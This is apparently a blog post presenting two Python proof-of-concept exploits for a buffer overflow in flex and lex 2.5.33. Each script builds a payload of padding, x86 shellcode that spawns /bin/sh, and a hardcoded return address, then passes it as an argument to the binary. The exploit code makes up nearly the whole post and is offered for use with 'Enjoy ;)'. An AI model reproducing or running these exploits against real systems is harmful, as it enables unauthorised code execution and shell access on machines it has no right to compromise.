I was testing some old bugs in one old distro, and that's how I found sigsegv in flex (2.5.33).
Below is the proof of concept:
---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#
from subprocess import call
flex = '/usr/bin/flex'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"
payload = nops + shellcode + ret
call([flex,payload])
print 'Done\n\n'
---
Second one is pretty similar (this time for /usr/bin/lex binary):
---
#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#
from subprocess import call
lex = '/usr/bin/lex'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"
payload = nops + shellcode + ret
call([lex,payload])
print 'Done\n\n'
---
Enjoy ;)
o/
No comments:
Post a Comment
What do You think...?